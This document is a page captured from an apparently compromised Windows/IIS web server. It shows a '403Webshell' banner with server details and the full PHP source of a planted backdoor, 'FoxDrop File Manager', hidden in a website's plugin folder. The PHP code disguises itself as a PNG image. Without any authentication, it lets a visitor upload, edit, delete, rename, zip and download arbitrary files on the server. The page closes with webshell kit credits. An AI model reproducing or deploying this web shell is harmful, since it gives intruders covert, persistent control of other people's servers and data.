403Webshell
Server IP : 103.118.17.23  /  Your IP : 216.73.216.188
Web Server : Microsoft-IIS/10.0
System : Windows NT RESELLERPLESK22 10.0 build 20348 (Windows Server 2016) AMD64
User : IWAM_plesk(default) ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/plugins/QAnyTimeBox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/vhosts/mesa.org.in/httpdocs/assets/plugins/QAnyTimeBox/index.php
<?php
// 🛡️ FOXDROP FILE MANAGER (Stealth PNG Disguise)

// === PNG disguise (fake image if ?i passed)
if (isset($_GET['i'])) {
    header('Content-Type: image/png');
    echo base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgVKJLF4AAAAASUVORK5CYII=');
    exit;
}

$path = isset($_GET['go']) ? $_GET['go'] : getcwd();
$path = realpath($path);
$sort = $_GET['sort'] ?? 'name';
$order = $_GET['order'] ?? 'asc';

if (!$path || !is_dir($path)) $path = getcwd();
chdir($path);

// === Actions
if (isset($_FILES['upload_file'])) {
    move_uploaded_file($_FILES['upload_file']['tmp_name'], $path . '/' . $_FILES['upload_file']['name']);
}
if (isset($_POST['newfile'])) {
    file_put_contents($path . '/' . $_POST['newfile'], '');
}
if (isset($_POST['newfolder'])) {
    mkdir($path . '/' . $_POST['newfolder']);
}
if (isset($_GET['delete'])) {
    $target = realpath($path . '/' . $_GET['delete']);
    if ($target && strpos($target, $path) === 0) {
        is_dir($target) ? rmdir($target) : unlink($target);
    }
}
if (isset($_POST['edit_file']) && isset($_POST['new_content'])) {
    file_put_contents($_POST['edit_file'], $_POST['new_content']);
}
if (isset($_GET['download'])) {
    $file = realpath($path . '/' . $_GET['download']);
    if ($file && is_file($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        readfile($file);
        exit;
    }
}
if (isset($_GET['zip']) && $_GET['zip'] === 'true') {
    $file = realpath($path . '/' . $_GET['file']);
    if (is_file($file)) {
        $zip = new ZipArchive();
        $zipPath = $file . '.zip';
        if ($zip->open($zipPath, ZipArchive::CREATE) === TRUE) {
            $zip->addFile($file, basename($file));
            $zip->close();
        }
    }
}
if (isset($_GET['unzip']) && $_GET['unzip'] === 'true') {
    $file = realpath($path . '/' . $_GET['file']);
    if (is_file($file) && pathinfo($file, PATHINFO_EXTENSION) === 'zip') {
        $zip = new ZipArchive();
        if ($zip->open($file)) {
            $zip->extractTo($path);
            $zip->close();
        }
    }
}
if (isset($_GET['rename']) && isset($_GET['to'])) {
    $old = realpath($path . '/' . $_GET['rename']);
    $new = $path . '/' . $_GET['to'];
    if ($old && strpos($old, $path) === 0) {
        rename($old, $new);
    }
}

// === UI Output
echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>FoxDrop File Manager</title>
<style>
body { font-family: sans-serif; font-size:14px; background:#f9f9f9; }
a { text-decoration: none; color: #007bff; }
a:hover { text-decoration: underline; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 6px 10px; border-bottom: 1px solid #ccc; text-align: left; }
.actions a { margin-right: 10px; }
.topbar { background:#fff; padding:10px; border-bottom:1px solid #ccc; display:flex; align-items:center; justify-content: space-between; }
.path { flex-grow: 1; }
.controls form { display:inline; margin-left:10px; }
.controls input[type='text'] { padding:4px; }
</style>
</head><body>";

echo "<div class='topbar'><div class='path'><strong>FoxDrop File Manager</strong><br>Path: ";

$parts = explode(DIRECTORY_SEPARATOR, $path);
$build = '';
echo "<a href='?go=" . urlencode(DIRECTORY_SEPARATOR) . "'>/</a>";
foreach ($parts as $p) {
    if ($p === '') continue;
    $build .= DIRECTORY_SEPARATOR . $p;
    echo "<a href='?go=" . urlencode($build) . "'>" . htmlspecialchars($p) . "</a>/";
}
echo "</div>";

echo "<div class='controls'>
<form method='post' enctype='multipart/form-data'><input type='file' name='upload_file' onchange='this.form.submit()'></form>
<form method='post'><input type='text' name='newfile' placeholder='New File'><button>Create File</button></form>
<form method='post'><input type='text' name='newfolder' placeholder='New Folder'><button>Create Folder</button></form>
</div></div><hr>";

$files = scandir($path);
$items = [];
foreach ($files as $f) {
    if ($f === '.') continue;
    $items[] = $f;
}

usort($items, function($a, $b) use ($sort, $order, $path) {
    $valA = ($sort === 'size') ? filesize("$path/$a") : $a;
    $valB = ($sort === 'size') ? filesize("$path/$b") : $b;
    return $order === 'asc' ? $valA <=> $valB : $valB <=> $valA;
});

echo "<table><tr><th><a href='?go=" . urlencode($path) . "&sort=name&order=" . ($order === 'asc' ? 'desc' : 'asc') . "'>Name</a></th>
<th><a href='?go=" . urlencode($path) . "&sort=size&order=" . ($order === 'asc' ? 'desc' : 'asc') . "'>Size</a></th>
<th>Permissions</th><th>Actions</th></tr>";

foreach ($items as $file) {
    $full = $path . '/' . $file;
    $isDir = is_dir($full);
    echo "<tr><td>" . ($isDir ? "📁" : "📄") . " ";
    echo $isDir ? "<a href='?go=" . urlencode($full) . "'>" . htmlspecialchars($file) . "</a>" : htmlspecialchars($file);
    echo "</td><td>" . ($isDir ? "-" : filesize($full)) . "</td><td>" . substr(sprintf('%o', fileperms($full)), -4) . "</td><td class='actions'>";
    echo !$isDir ? "<a href='?go=" . urlencode($path) . "&edit=" . urlencode($file) . "'>Edit</a> | " : "";
    echo "<a href='?go=" . urlencode($path) . "&download=" . urlencode($file) . "'>Download</a> | ";
    echo "<a href='#' onclick='renameFile(\"" . htmlspecialchars($file) . "\")'>Rename</a> | ";
    echo "<a href='?go=" . urlencode($path) . "&delete=" . urlencode($file) . "' onclick='return confirm(\"Delete " . addslashes($file) . "?\")'>Delete</a>";
    if (!$isDir && strtolower(pathinfo($file, PATHINFO_EXTENSION)) === 'zip') {
        echo " | <a href='?go=" . urlencode($path) . "&unzip=true&file=" . urlencode($file) . "'>Unzip</a>";
    } elseif (!$isDir) {
        echo " | <a href='?go=" . urlencode($path) . "&zip=true&file=" . urlencode($file) . "'>ZIP</a>";
    }
    echo "</td></tr>";
}
echo "</table>";

// === Edit Modal
if (isset($_GET['edit'])) {
    $editFile = realpath($path . '/' . $_GET['edit']);
    if (is_file($editFile)) {
        $content = htmlspecialchars(file_get_contents($editFile));
        echo "<div id='editModal' style='
        position:fixed; top:50%; left:50%; transform:translate(-50%,-50%);
        width:80%; max-width:800px; height:80%; max-height:600px;
        background:#fff; border:2px solid #000; padding:10px; z-index:1000; box-shadow:0 0 15px rgba(0,0,0,0.4);'>
        <form method='post' style='height:100%; display:flex; flex-direction:column;'>
        <input type='hidden' name='edit_file' value='" . htmlspecialchars($editFile) . "'>
        <textarea name='new_content' style='flex:1; width:100%; resize:none; font-family:monospace;'>$content</textarea>
        <div style='text-align:right; margin-top:10px;'>
        <button type='submit'>Save</button>
        <button type='button' onclick='window.location.href=\"?go=" . urlencode($path) . "\"'>Cancel</button>
        </div></form></div>";
    }
}

echo "<script>
function renameFile(oldName) {
    var newName = prompt('Rename to:', oldName);
    if (newName && newName !== oldName) {
        window.location.href = '?go=" . urlencode($path) . "&rename=' + encodeURIComponent(oldName) + '&to=' + encodeURIComponent(newName);
    }
}
</script>";

echo "</body></html>";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit